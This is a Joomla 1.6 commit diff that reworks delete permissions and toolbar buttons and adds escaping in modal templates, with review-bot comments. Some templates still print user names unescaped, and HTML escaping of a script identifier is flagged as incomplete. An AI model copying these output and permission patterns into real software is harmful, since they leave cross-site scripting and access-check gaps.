Preparing for 1.6.2
git-svn-id: http://joomlacode.org/svn/joomla/development/trunk@21148 6f6e1ebd-4c2b-0410-823f-f34bde69bce9
parent
5ce00dde60
commit
c4c870b5cb
|
@ -34,18 +34,23 @@ class BannersModelBanner extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
if (!empty($record->catid)) {
|
if (!empty($record->catid)) {
|
||||||
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return parent::canDelete($record);
|
return parent::canDelete($record);
|
||||||
}
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state changed.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
|
|
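Review bot: The guard added at the top of `canDelete()` leaves with a bare `return ;` when `$record->state != -2`, and the method also falls off the end when `$record->id` is empty, so both refusal paths yield `null` although the docblock promises a boolean. `null` is falsy, so a loose check still denies, but a caller comparing with `=== false` would not see the refusal; writing `return false;` in both places makes the deny-by-default explicit. The same shape appears in the `canDelete()` changes for BannersModelClient, CategoriesModelCategory, ContactModelContact, ContentModelArticle, MenusModelItem, NewsfeedsModelNewsfeed, RedirectModelLink and WeblinksModelWeblink. A one-line comment such as `// Only records already in the trash (state -2) may be deleted permanently.` would also explain the magic number.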
@ -28,13 +28,18 @@ class BannersModelClient extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
if (!empty($record->catid)) {
|
return ;
|
||||||
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
}
|
||||||
}
|
$user = JFactory::getUser();
|
||||||
else {
|
|
||||||
return $user->authorise('core.delete', 'com_banners');
|
if (!empty($record->catid)) {
|
||||||
|
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return $user->authorise('core.delete', 'com_banners');
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -88,15 +88,14 @@ class BannersViewBanners extends JView
|
||||||
JToolBarHelper::custom('banners.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
JToolBarHelper::custom('banners.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
||||||
}
|
}
|
||||||
|
|
||||||
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
|
|
||||||
|
if ($canDo->get('core.edit.state')) {
|
||||||
|
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
|
||||||
|
}
|
||||||
|
if ( $canDo->get('core.delete')) {
|
||||||
JToolBarHelper::deleteList('', 'banners.delete','JTOOLBAR_EMPTY_TRASH');
|
JToolBarHelper::deleteList('', 'banners.delete','JTOOLBAR_EMPTY_TRASH');
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
}
|
}
|
||||||
else if ($canDo->get('core.edit.state')) {
|
|
||||||
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
|
|
||||||
JToolBarHelper::divider();
|
|
||||||
}
|
|
||||||
|
|
||||||
if ($canDo->get('core.admin')) {
|
if ($canDo->get('core.admin')) {
|
||||||
JToolBarHelper::preferences('com_banners');
|
JToolBarHelper::preferences('com_banners');
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
|
|
|
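Review bot: The Empty Trash button now appears to be added whenever `$canDo->get('core.delete')` is true, without the `filter.state == -2` condition, while the model's `canDelete()` in this commit refuses any record whose state is not -2. The model check still decides the outcome, so this is a consistency point rather than a hole: MenusViewItems keeps `$this->state->get('filter.published') == -2 && $canDo->get('core.delete')`, and BannersViewClients drops it like this view does. Either keep the filter condition in all three views or add a comment saying the button is intentionally always shown. `JToolBarHelper::divider()` is also emitted only inside the `core.delete` branch now, so a user with edit-state rights alone gets no divider after the Trash button.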
@ -69,11 +69,11 @@ class BannersViewClients extends JView
|
||||||
JToolBarHelper::archiveList('clients.archive','JTOOLBAR_ARCHIVE');
|
JToolBarHelper::archiveList('clients.archive','JTOOLBAR_ARCHIVE');
|
||||||
JToolBarHelper::custom('clients.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
JToolBarHelper::custom('clients.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
||||||
}
|
}
|
||||||
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
|
if ($canDo->get('core.edit.state')) {
|
||||||
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
|
|
||||||
JToolBarHelper::divider();
|
|
||||||
} else if ($canDo->get('core.edit.state')) {
|
|
||||||
JToolBarHelper::trash('clients.trash','JTOOLBAR_TRASH');
|
JToolBarHelper::trash('clients.trash','JTOOLBAR_TRASH');
|
||||||
|
}
|
||||||
|
if ( $canDo->get('core.delete')) {
|
||||||
|
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -34,10 +34,16 @@ class CategoriesModelCategory extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
|
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
|
||||||
}
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can be deleted.
|
||||||
|
|
|
@ -30,19 +30,18 @@ class ContactModelContact extends JModelAdmin
|
||||||
* @since 1.6
|
* @since 1.6
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
if ($record->catid) {
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);
|
return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);
|
||||||
}
|
}
|
||||||
else {
|
|
||||||
return parent::canDelete($record);
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state edited.
|
||||||
*
|
*
|
||||||
* @param object $record A record object.
|
* @param object $record A record object.
|
||||||
*
|
*
|
||||||
|
|
|
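Review bot: The rewritten `canDelete()` appears to drop the `$record->catid` test before building the asset name, so a contact without a category would be checked against `com_contact.category.0`, and the `parent::canDelete($record)` fallback from the old side is gone. The banner, newsfeed and weblink models changed in this commit keep that branch inside the new `id` guard. If dropping it here was not intended, restore `if (!empty($record->catid)) { ... } else { return parent::canDelete($record); }`. How `authorise()` resolves an asset name that does not exist is not visible on this page, so the effective permission in that case should be confirmed.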
@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td align="center">
|
<td align="center">
|
||||||
|
|
|
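Review bot: `$this->escape($function)` applies HTML escaping to a value that is printed as a JavaScript identifier inside an `onclick` attribute. That stops the value from closing the attribute, but characters that HTML escaping leaves alone are still interpreted as script in the handler, so the stronger control is to restrict `$function` to identifier characters at the point where it is read, which is outside this hunk. If that assignment uses `JRequest::getVar()`, reading it with `JRequest::getCmd()` instead would enforce such an allow-list. The same applies to every other modal template in this commit that received the identical change.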
@ -39,13 +39,17 @@ class ContentModelArticle extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state edited.
|
||||||
*
|
*
|
||||||
* @param object $record A record object.
|
* @param object $record A record object.
|
||||||
*
|
*
|
||||||
|
|
|
@ -88,7 +88,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
||||||
<?php echo $this->escape($item->title); ?></a>
|
<?php echo $this->escape($item->title); ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -55,13 +55,18 @@ class MenusModelItem extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
return $user->authorise('core.delete', 'com_menus.item.'.(int) $record->id);
|
return $user->authorise('core.delete', 'com_menus.item.'.(int) $record->id);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state edited.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
*
|
*
|
||||||
|
|
|
@ -185,13 +185,13 @@ class MenusViewItems extends JView
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
JToolBarHelper::custom('items.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
JToolBarHelper::custom('items.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
||||||
}
|
}
|
||||||
|
if ($canDo->get('core.edit.state')) {
|
||||||
|
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
|
||||||
|
}
|
||||||
if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) {
|
if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) {
|
||||||
JToolBarHelper::deleteList('', 'items.delete','JTOOLBAR_EMPTY_TRASH');
|
JToolBarHelper::deleteList('', 'items.delete','JTOOLBAR_EMPTY_TRASH');
|
||||||
}
|
}
|
||||||
else if ($canDo->get('core.edit.state')) {
|
|
||||||
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
|
|
||||||
}
|
|
||||||
|
|
||||||
if ($canDo->get('core.edit.state')) {
|
if ($canDo->get('core.edit.state')) {
|
||||||
JToolBarHelper::makeDefault('items.setDefault', 'COM_MENUS_TOOLBAR_SET_HOME');
|
JToolBarHelper::makeDefault('items.setDefault', 'COM_MENUS_TOOLBAR_SET_HOME');
|
||||||
|
|
|
@ -85,8 +85,11 @@ class ModulesModelModule extends JModelAdmin
|
||||||
if ($table->load($pk)) {
|
if ($table->load($pk)) {
|
||||||
|
|
||||||
// Access checks.
|
// Access checks.
|
||||||
if (!$user->authorise('core.delete', 'com_modules')) {
|
if (!$user->authorise('core.delete', 'com_modules') ||
|
||||||
throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
|
$table->published != -2) {
|
||||||
|
JError::raiseWarning(403, JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
|
||||||
|
// throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
|
||||||
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (!$table->delete($pk)) {
|
if (!$table->delete($pk)) {
|
||||||
|
|
|
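Review bot: The refusal path now calls `JError::raiseWarning()` and leaves with a bare `return;`, with the old `throw` kept as a commented-out line. The enclosing method starts and ends outside this hunk, so whether it runs inside a loop over several ids is not visible; if it does, the bare return stops at the first refused module and hands `null` back to the caller. Use `return false;` so the refusal is an explicit boolean, and delete the commented-out `throw` instead of leaving both error styles in the file. The warning text is also the same for a missing permission and for a module that is not in the trash (`$table->published != -2`), which makes a refused delete harder to diagnose.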
@ -34,18 +34,23 @@ class NewsfeedsModelNewsfeed extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
if (!empty($record->catid)) {
|
return ;
|
||||||
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
|
}
|
||||||
}
|
$user = JFactory::getUser();
|
||||||
else {
|
|
||||||
return parent::canDelete($record);
|
if (!empty($record->catid)) {
|
||||||
}
|
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return parent::canDelete($record);
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state changed.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
|
|
@ -85,7 +85,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -24,6 +24,45 @@ class RedirectModelLink extends JModelAdmin
|
||||||
* @since 1.6
|
* @since 1.6
|
||||||
*/
|
*/
|
||||||
protected $text_prefix = 'COM_REDIRECT';
|
protected $text_prefix = 'COM_REDIRECT';
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Method to test whether a record can be deleted.
|
||||||
|
*
|
||||||
|
* @param object $record A record object.
|
||||||
|
*
|
||||||
|
* @return boolean True if allowed to delete the record. Defaults to the permission set in the component.
|
||||||
|
* @since 1.6
|
||||||
|
*/
|
||||||
|
protected function canDelete($record)
|
||||||
|
{
|
||||||
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
return $user->authorise('core.delete', 'com_redirect');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Method to test whether a record can have its state edited.
|
||||||
|
*
|
||||||
|
* @param object $record A record object.
|
||||||
|
*
|
||||||
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
* @since 1.6
|
||||||
|
*/
|
||||||
|
protected function canEditState($record)
|
||||||
|
{
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
|
// Check the component since there are no categories or other assets.
|
||||||
|
if (!empty($record->id)) {
|
||||||
|
return parent::canEditState($record);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Returns a reference to the a Table object, always creating it.
|
* Returns a reference to the a Table object, always creating it.
|
||||||
*
|
*
|
||||||
|
|
|
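Review bot: The new `canEditState()` assigns `$user = JFactory::getUser();` and never uses it, and it returns nothing when `$record->id` is empty, so that path yields `null` instead of the boolean the docblock states. The comment `// Check the component since there are no categories or other assets.` describes a check the body does not perform itself; it only delegates to `parent::canEditState($record)`. Drop the unused assignment, and either return `parent::canEditState($record)` unconditionally or end the method with `return false;`. The `canDelete()` added above it has the same missing-return shape.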
@ -23,7 +23,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" size="40" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" size="40" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
||||||
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
||||||
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
||||||
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
||||||
</div>
|
</div>
|
||||||
<div class="right">
|
<div class="right">
|
||||||
<ol>
|
<ol>
|
||||||
|
@ -64,7 +64,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
foreach ($this->items as $item) : ?>
|
foreach ($this->items as $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $item->name; ?></a>
|
<?php echo $item->name; ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td align="center">
|
<td align="center">
|
||||||
|
@ -79,7 +79,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
</table>
|
</table>
|
||||||
<div>
|
<div>
|
||||||
<input type="hidden" name="task" value="" />
|
<input type="hidden" name="task" value="" />
|
||||||
<input type="hidden" name="field" value="<?php echo $field; ?>" />
|
<input type="hidden" name="field" value="<?php echo $this->escape($field); ?>" />
|
||||||
<input type="hidden" name="boxchecked" value="0" />
|
<input type="hidden" name="boxchecked" value="0" />
|
||||||
<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
|
<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
|
||||||
<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
|
<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
|
||||||
|
|
|
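Review bot: The link text `<?php echo $item->name; ?>` in the row loop is still printed without escaping, although this commit escapes `$function` and `$field` in the same template and the other modal templates print `$this->escape($item->name)`. A user name is user-supplied data, so it should be HTML-escaped at output: `<?php echo $this->escape($item->name); ?></a>`. The second users modal template later in this commit has the same unescaped line.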
@ -34,18 +34,23 @@ class WeblinksModelWeblink extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
if ($record->catid) {
|
return ;
|
||||||
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
|
}
|
||||||
}
|
$user = JFactory::getUser();
|
||||||
else {
|
|
||||||
return parent::canDelete($record);
|
if ($record->catid) {
|
||||||
}
|
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return parent::canDelete($record);
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state changed.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
|
|
@ -20,7 +20,7 @@ defined('_JEXEC') or die;
|
||||||
/*
|
/*
|
||||||
* Installation check, and check on removal of the install directory.
|
* Installation check, and check on removal of the install directory.
|
||||||
*/
|
*/
|
||||||
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
|
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
|
||||||
header('Location: ../installation/index.php');
|
header('Location: ../installation/index.php');
|
||||||
exit();
|
exit();
|
||||||
}
|
}
|
||||||
|
|
|
@ -90,7 +90,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<th>
|
<th>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</th>
|
</th>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -86,7 +86,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<th>
|
<th>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
||||||
<?php echo $this->escape($item->title); ?></a>
|
<?php echo $this->escape($item->title); ?></a>
|
||||||
</th>
|
</th>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<th>
|
<th>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</th>
|
</th>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -25,7 +25,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
||||||
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
||||||
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
||||||
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
||||||
</div>
|
</div>
|
||||||
<div class="filter-select">
|
<div class="filter-select">
|
||||||
<label for="filter_group_id">
|
<label for="filter_group_id">
|
||||||
|
@ -60,7 +60,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
foreach ($this->items as $item) : ?>
|
foreach ($this->items as $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $item->name; ?></a>
|
<?php echo $item->name; ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -85,6 +85,7 @@ class BannersModelBanners extends JModelList
|
||||||
if ($cid) {
|
if ($cid) {
|
||||||
$query->where('a.cid = ' . (int) $cid);
|
$query->where('a.cid = ' . (int) $cid);
|
||||||
$query->join('LEFT', '#__banner_clients AS cl ON cl.id = a.cid');
|
$query->join('LEFT', '#__banner_clients AS cl ON cl.id = a.cid');
|
||||||
|
$query->join('LEFT', '#__categories as cat ON a.catid = cat.id');
|
||||||
$query->select('cl.track_impressions as client_track_impressions');
|
$query->select('cl.track_impressions as client_track_impressions');
|
||||||
$query->where('cl.state = 1');
|
$query->where('cl.state = 1');
|
||||||
}
|
}
|
||||||
|
@ -138,7 +139,7 @@ class BannersModelBanners extends JModelList
|
||||||
foreach ($keywords as $keyword)
|
foreach ($keywords as $keyword)
|
||||||
{
|
{
|
||||||
$keyword=trim($keyword);
|
$keyword=trim($keyword);
|
||||||
